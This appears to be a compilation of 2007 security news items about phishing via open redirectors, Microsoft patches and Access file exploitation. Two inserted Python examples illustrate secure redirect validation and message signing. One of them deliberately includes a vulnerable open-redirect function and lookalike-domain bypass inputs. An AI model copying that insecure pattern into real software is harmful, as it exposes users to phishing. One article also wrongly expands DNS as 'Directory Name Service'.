"2007 was the year of the browser exploit, the data breach, spyware and the storm worm. We expect 2008 to be the year of the iPhone attack, the Chinese hacker, P2P network spammers and the hijacking of the Storm botnet," Jose Nazario, senior security engineer at Arbor Networks, said in the statement.

"Online fraud is soaring and security attacks are now being used in countless and ever more sophisticated ways to both steal and launder money. Financial and other confidential data is being obtained, sold and utilized in the highly-developed black market," Nazario said.

"In 2008, this market will continue to grow and it is important that businesses implement the processes and technology necessary to protect themselves and their customers."


Slapdash staff put corporate data at risk

More than half (57 per cent) of office employees admit to having lost an office laptop, BlackBerry or USB stick at some point in their careers, according to a recent survey.

Pubs, bars or restaurants are cited as the most common locations, the study by online backup firm Databarracks reported.

More than three quarters (77 per cent) of the 100 office workers canvassed in the survey also confessed to storing personal content such as photos on their office network or computers, despite the risk of malware infection.

According to the survey, personal data is often prioritised over company data in the workplace. In the event of an office fire, 77 per cent of respondents indicated they would reach for their personal mobile phones ahead of their work PC.

"This research paints a frightening picture for UK organisations. Almost every business, irrelevant of sector, is reliant on the information stored on its IT network to manage day-to-day operations," said Databarracks managing director Peter Groucutt.

“While employees can be educated to treat corporate data more carefully, human error will always be a factor, so this is not a problem that is going to disappear overnight. More organisations have to start seriously considering secure online backup to protect themselves from unforeseen events.”


Cybercrooks lurk in shadows of big-name websites

A small team of security researchers has documented how many high-profile websites are unwittingly helping phishing fraudsters.

Phishing scams often use "open redirector" exploits on major sites to make their attack URL look more legitimate. The trick also makes it more likely that fraudulent emails that form the basis of phishing attacks will slip past spam filters. Typically, security flaws on exploited high-profile sites allow a phisher to provide a link which appears to be a legitimate URL, but actually redirects to a fraudulent site.
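The flaw on the big-name site is usually a redirect endpoint that forwards the visitor to whatever URL its parameter carries. As an added example (not SiteTruth's code or any listed site's), here is that pattern beside a hardened version of the same check; the site host, the parameter name and the sample URLs are constructed for the illustration:

```python
from urllib.parse import urlparse

SITE_HOST = "www.example.com"   # constructed: the host that owns the redirect endpoint


def unsafe_redirect_target(next_url):
    """The open-redirector pattern: the 'next' parameter is trusted as given, so a
    link that begins with a trusted host can end anywhere the parameter says."""
    return next_url


def safe_redirect_target(next_url, site_host=SITE_HOST, fallback="/"):
    """Accept only paths on this site, or absolute https URLs whose host is exactly
    ours; anything else lands on the fallback page."""
    if not next_url:
        return fallback
    parsed = urlparse(next_url)
    if parsed.scheme or parsed.netloc:
        # Absolute URL: require https and an exact netloc match, so userinfo,
        # ports and lookalike suffixes such as our-host.elsewhere all fail.
        if parsed.scheme == "https" and parsed.netloc == site_host:
            return next_url
        return fallback
    # Relative: must be an in-site path. Browsers treat '//host' and '/\host'
    # as protocol-relative, so a second slash or a backslash is rejected.
    if not next_url.startswith("/") or next_url[1:2] in ("/", "\\"):
        return fallback
    return next_url


if __name__ == "__main__":
    for candidate in ("/account/settings", "https://www.example.com/help",
                      "//elsewhere.example/", "/\\elsewhere.example",
                      "https://www.example.com.elsewhere.example/"):
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)!r}")
```

An exact comparison of the whole netloc is deliberate: a suffix or substring check on the host name is the usual mistake that lets a lookalike domain through. Where a site genuinely needs to send users off-site, the target should be chosen from a server-side allowlist rather than taken from the request.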

Previous Register stories have covered examples of the ruse practiced on websites including Barclays Bank (story here), eBay (here), and others.

To date, most of the information about the topic has been anecdotal. SiteTruth aims to shed light on the scope of the problem by collecting hard numbers as part of a project that ultimately aims to provide a search engine that will allow clued-up surfers to check on the legitimacy of sites. SiteTruth's search service isn't limited to sites that have paid a fee. Nor is it selling "seals of approval".

Its findings are partly based on existing business records, as well as links with other anti-phishing organisations (such as PhishTank, a clearing house for reports about phishing sites), and its own research. It also takes submissions from webmasters, as explained here.

Even so, the site admits its findings aren't infallible and ought to serve only as a guideline. The safe search feature is currently in Alpha testing.

SiteTruth's research, based on the collection of information about exploited websites and updated every three hours, also reports on insecure practices that serve the interest of cybercrooks. SiteTruth breaks down the vulnerabilities it finds into five categories, as follows:

* Open redirectors
* Sites that allow user hosted content in ways exploitable for phishing (e.g. "photobucket.com", which will accept uploads of Flash files)
* ISPs that provide DSL or cable connections for phishing sites
* Unscrupulous commercial hosting services
* Compromised sites exploited by phishers (Universities with high bandwidth connections and lax security are a favourite in this category)

Some of the items on the list cover broadly similar ground to that documented by Spamhaus and others. However, the open redirector run-down compiled by SiteTruth is a distinct list that makes for interesting reading.

SiteTruth has cross-referenced the 10,000 sites listed in PhishTank with the 1.7 million sites in the Open Directory Project database to discover a list of 171 problem domains. Domains listed typically have a security vulnerability which is being exploited by phishing fraudsters.

URL redirection isn't the only category for listing in this blacklist (hosting or otherwise unwittingly helping phishing scams also counts). But the sites allowing URL redirection include many high-profile organisations that ought to know better, including Google Maps. It's easy to bounce off Google Maps to reach The Register, for example.

AOL, Microsoft Live, the BBC, Yahoo!, and UK bank Alliance and Leicester have also been greylisted by SiteTruth over the last three weeks.

"Phishing sites come and go rapidly; this list may be out of date within hours," SiteTruth's John Nagle told El Reg. "Some sites are still in PhishTank because they had an active phish in the recent past and PhishTank hasn't purged the entries yet. But some major sites have been on the list for weeks to months.

"So some major websites are being used to lend credibility to phishing attacks. But the number of major sites involved isn't large. It's no longer an acceptable excuse to claim that 'everybody has that problem'. Only some have it, and they need to fix it."


Microsoft's December Patches Squash Security Bugs

Critical bug-fixes ship for Internet Explorer, DirectX, and Windows Media Format technology.

Microsoft has released its monthly set of security patches, fixing critical flaws in the Windows desktop.

The December updates released Tuesday include critical fixes for Internet Explorer, DirectX and the Windows Media Format technology. Security experts say that the most important of these updates is the Internet Explorer patch, because it fixes four separate bugs in the browser. One of these flaws, relating to the way the browser renders dynamic HTML (DHTML) pages, has been exploited in online attacks, Microsoft said.

All of the browser vulnerabilities in this update are rated critical -- Microsoft's most serious rating -- for IE 7 users running on the latest version of Windows XP, Microsoft said.

Though Microsoft has assigned it the less-grave rating of "important," a patch for Macrovision copy-protection software that ships with Windows should also be given priority, security experts say. That's because criminals have already leveraged this bug in online attacks.

The Macrovision issue first cropped up in mid-October, when Symantec spotted attackers exploiting the flaw, but Microsoft was not able to ship a fix for the problem in last month's security updates, released Nov. 13. The flaw could be used by attackers to allow their software to run at a higher level of privilege within the operating system.

The flaw lies in the secdrv.sys driver that is used by Macrovision's SafeDisc system, which ships with Windows XP and Windows Server 2003.

Microsoft also issued important updates for the Windows Vista Server Message Block (SMB) version 2 filesharing protocol, the Vista kernel, and the Message Queuing Service in XP and Windows 2000.

Microsoft did not fix a recently publicized flaw in the way its Windows operating system looks up other computers on the Internet. This bug, which was publicized at a hacker conference in New Zealand, has to do with the way Windows systems look for DNS (Directory Name Service) information under certain configurations.

Interestingly, the Vista SMB flaw lies in a feature that allows senders to digitally sign SMB data in order to confirm that it is legitimate. Because the signing feature is not properly implemented, however, "an attacker could modify SMBv2 packets and impersonate a trusted source to perform malicious operations," Microsoft said.

"It's a security vulnerability in a security feature," said Eric Schultze, chief technology officer of Shavlik Technologies, via instant message. "SMB version 2 was built for Vista and Windows Server 2008, so it should have been vetted in the code design process. But it obviously slipped through."
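What a signing feature has to get right for the check to mean anything, as an added example (not Microsoft's SMB2 implementation): the receiver must recompute the keyed MAC over the whole message with the signature field zeroed, compare it in constant time, bind the message id so a captured packet cannot be replayed, and refuse unsigned messages when signing is required. The wire format below is constructed for the illustration, with a 16-byte signature field like SMB2's; the session key and payloads are sample values.

```python
import hashlib
import hmac
import struct

HDR = struct.Struct("!BI")      # constructed header: flags (1 byte) + message id (4 bytes)
SIG_LEN = 16                    # 16-byte signature field, as SMB2 uses
FLAG_SIGNED = 0x01


def _mac(key, header, payload):
    """Keyed MAC over the full message with the signature field zeroed."""
    zeroed = header + b"\x00" * SIG_LEN + payload
    return hmac.new(key, zeroed, hashlib.sha256).digest()[:SIG_LEN]


def build_packet(key, msg_id, payload, signed=True):
    """Sender side: header, signature, payload. Unsigned packets carry a zero field."""
    flags = FLAG_SIGNED if signed else 0
    header = HDR.pack(flags, msg_id)
    sig = _mac(key, header, payload) if signed else b"\x00" * SIG_LEN
    return header + sig + payload


def verify_packet(key, packet, expected_msg_id, require_signing=True):
    """Receiver side. With require_signing=False this behaves like a lenient
    receiver that lets an unsigned packet through; that is the weak setting."""
    if len(packet) < HDR.size + SIG_LEN:
        return False
    header = packet[:HDR.size]
    sig = packet[HDR.size:HDR.size + SIG_LEN]
    payload = packet[HDR.size + SIG_LEN:]
    flags, msg_id = HDR.unpack(header)
    if msg_id != expected_msg_id:          # replayed or reordered message
        return False
    if not flags & FLAG_SIGNED:
        return not require_signing         # unsigned: only a lenient receiver accepts it
    return hmac.compare_digest(sig, _mac(key, header, payload))


def tamper(packet):
    """Flip one bit of the payload, as a man-in-the-middle would modify a request."""
    return packet[:-1] + bytes([packet[-1] ^ 0x01])


if __name__ == "__main__":
    key = b"constructed-session-key"
    good = build_packet(key, 7, b"WRITE share/report.txt")
    print(verify_packet(key, good, 7))            # True
    print(verify_packet(key, tamper(good), 7))    # False: signature no longer matches
    print(verify_packet(key, good, 8))            # False: wrong message id
    unsigned = build_packet(key, 7, b"WRITE share/report.txt", signed=False)
    print(verify_packet(key, unsigned, 7))        # False: signing required
    print(verify_packet(key, unsigned, 7, require_signing=False))  # True: the weak setting
```

The last two lines are the contrast Schultze is pointing at: a signing feature that can be bypassed by clearing a flag, or whose check covers less than the whole packet, offers no protection against modification or impersonation even though the signature bytes are present on the wire.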

In all, seven sets of patches were released Tuesday, fixing 11 vulnerabilities.

Though Microsoft has made much of its efforts to develop more secure software, the company ended 2007 with about the same number of security updates that it had in the year before, according to security vendor Kaspersky Lab. "The situation in 2007 hasn't changed noticeably from 2006," wrote David Emm, a senior technology consultant with Kaspersky, in a blog post. "Last year there were 49 critical, 23 important, and 5 moderate updates. 2007 brought very slightly fewer patches, with 43 critical, 24 important, and 2 moderate fixes."


Microsoft Office Access File Open To Hacker Attacks

San Francisco, CA (AHN) - A U.S. government computer security watchdog warned companies using Microsoft Office Access that hackers may be targeting the application. The U.S. Computer Emergency Readiness Team (US-CERT) said earlier this week it is aware of "active exploitation" of Access database files.

Although the agency provided no details on the attacks observed, hackers could use Access database files to inject computer commands. Both Microsoft Internet Explorer and Outlook Express normally block .mdb files, security vendor Symantec told InfoWorld.

As in previous warnings, Microsoft told users not to accept files from unknown sources.
